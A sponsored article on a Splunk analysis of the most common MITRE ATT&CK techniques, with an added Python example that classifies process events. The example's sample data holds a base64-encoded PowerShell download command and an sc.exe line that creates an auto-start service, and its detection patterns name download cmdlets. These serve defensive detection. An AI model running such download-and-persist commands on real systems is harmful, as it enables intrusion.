Cybercrime numbers are alarming. According to data management firm Splunk, 65% of organisations reported an increase in cyberattack attempts during 2022, and 49% have suffered a data breach since 2020 — a 10% leap. Though it can seem as if we’re losing the war against online criminals, this isn’t a one-sided confrontation.
Several reports note a reduction in successful breaches, and ransomware gangs took in less money during 2022 because companies are more reluctant to pay. It’s not enough to declare victory, but cybercrime stats no longer go in one direction, thanks to the industry educating people and businesses and adopting more sophisticated cybersecurity technologies.
Yet if security, data and risk teams are not careful, they might lose this advantage. A new analysis by Splunk, delving into the findings of several respected threat reports, reveals that the most popular attacks are often still among the simplest. Rather than only focusing on the latest security tech, enterprise teams should take advantage of shared intelligence and understand TTPs, or tactics, techniques and procedures.
This approach will help them thwart the most obvious attacks that tend to go under the radar, even in sophisticated cybersecurity estates, says Alan Browning, GM at Digital Resilience Insight, a Splunk partner:
“The Splunk report is an opportune reminder that only a small group of cybercriminals use the latest and most sophisticated techniques. Most will go for tested techniques, especially when those might be ignored by security teams looking at newer threats. But the real benefit of using this information and the ATT&CK knowledge base is that teams can predict and preempt these attacks and put proactive safeguards in place.”
Means of ATT&CK
Browning refers to MITRE ATT&CK, a knowledge base of adversary tactics and techniques. Splunk used ATT&CK data as part of its analysis, identifying the most common attack types based on real-world observations.
In Splunk’s analysis, four activities bubbled up as the most common:
- PowerShell command and scripting interpreter: Criminals abuse Microsoft's powerful PowerShell command-line shell and scripting language for tasks such as discovery and code execution.
- Obfuscated files or information: Criminals hide executables and other files from discovery by using encryption, compression and other methods.
- Ingress tool transfer: Once they gain a foothold, criminals transfer tools and files from an external system into a compromised system.
- System service execution: Criminals abuse system services or daemons to launch commands or programs, often at boot but also at other times.
These four are the most common, but Splunk lists several more important avenues of attack, including file and directory discovery, exploiting public-facing applications, and external remote services. Yet the overarching point is that these are known and obvious methods used by online criminals, and studying their TTPs will guide security teams to reinforce their environments.
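As an added illustration, not code from the article or from Splunk, of turning the four techniques above into something a detection team can run: constructed process-creation events are mapped to the public ATT&CK IDs of those techniques, and PowerShell's -EncodedCommand payload is decoded first so that the download it conceals is classified as well. The flat key=value event format, the regexes and the sample lines are all assumptions made for the example.

```python
import base64
import re
from collections import Counter
from typing import List, Optional

# Constructed sample: PowerShell -EncodedCommand takes base64 of UTF-16LE text, so the
# download command below never appears verbatim in the log line that records it.
HIDDEN_COMMAND = "Invoke-WebRequest http://example.invalid/tool.exe -OutFile C:\\Users\\Public\\tool.exe"
ENCODED = base64.b64encode(HIDDEN_COMMAND.encode("utf-16le")).decode("ascii")

# Constructed process-creation events in a flat key=value form (not data from the Splunk report).
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell.exe -nop -w hidden -EncodedCommand " + ENCODED,
    "Image=C:\\Windows\\System32\\sc.exe "
    "CommandLine=sc.exe create updsvc binPath= C:\\Users\\Public\\tool.exe start= auto",
    "Image=C:\\Windows\\System32\\notepad.exe CommandLine=notepad.exe C:\\Users\\alice\\notes.txt",
]

ENC_RE = re.compile(r"(?:^|\s)-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.I)
DOWNLOAD_RE = re.compile(r"Invoke-WebRequest|DownloadString|DownloadFile|Start-BitsTransfer", re.I)
SERVICE_RE = re.compile(r"\bsc(?:\.exe)?\s+create\b|New-Service", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext behind -EncodedCommand, or None if absent or malformed."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except ValueError:  # bad base64 (binascii.Error) or not UTF-16LE text
        return None


def classify(event: str) -> List[str]:
    """Map one event to the ATT&CK IDs of the article's four techniques (sorted)."""
    hits = set()
    if "powershell" in event.lower() or "pwsh" in event.lower():
        hits.add("T1059.001")  # Command and Scripting Interpreter: PowerShell
    decoded = decode_encoded_command(event)
    if decoded is not None:
        hits.add("T1027")  # Obfuscated Files or Information: the real command was hidden
    to_scan = event if decoded is None else event + " " + decoded  # scan what was concealed too
    if DOWNLOAD_RE.search(to_scan):
        hits.add("T1105")  # Ingress Tool Transfer
    if SERVICE_RE.search(to_scan):
        hits.add("T1569.002")  # System Services: Service Execution
    return sorted(hits)


def count_techniques(events) -> Counter:
    """Tally technique hits across events: the kind of ranking the top-four list reflects."""
    return Counter(t for e in events for t in classify(e))
```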
Know your TTPs
Tactics, techniques and procedures are very important, not least because it’s the criminals who tell us about them, says Browning.
“You’d think the bad guys would be stealthy and the good guys would work together. But it’s almost the opposite. While security people don’t share as much intelligence and knowledge as they could, adversaries love to share new and reliable attack methods with others on forums and such places. Between collecting attack data and reading what those guys post, we have access to excellent shared intelligence on what attacks to look for.”
The anatomy of an attack can be split into TTPs:
- Tactics are how online criminals carry out an attack, such as accessing data or moving around a network.
- Techniques are their general methods, such as installing malware or running unauthorised database commands — tactics usually consist of several techniques.
- Procedures are the granular steps by which a technique is carried out, for example crafting and deploying a phishing e-mail to deliver malicious software.
Security teams gain a significant advantage when they focus on popular attack methods and study their TTPs. While adopting the latest security measures is imperative, the fundamentals of comprehensive security come from understanding and preempting common attacks.
“Good security is about risk management,” says Browning. “Where are your risks and how do you mitigate against them? The downside is that the people who create those risks are very adversarial and constantly changing. But the upside is that they also want low risk and high reward, so they often go for proven tactics. Splunk’s analysis clearly shows this effect. I think it’s very important that security teams make TTP studies a part of their strategy, and that they use security providers that take the concept seriously.”
For more information, connect with Digital Resilience Insight on LinkedIn, or contact GM Alan Browning.
About Digital Resilience Insight
Digital Resilience Insight is a leading provider of data security solutions for businesses and organisations of all sizes. With its cutting-edge technology and knowledgeable team, the company is committed to helping its customers protect their sensitive information.
- This promoted content was paid for by the party concerned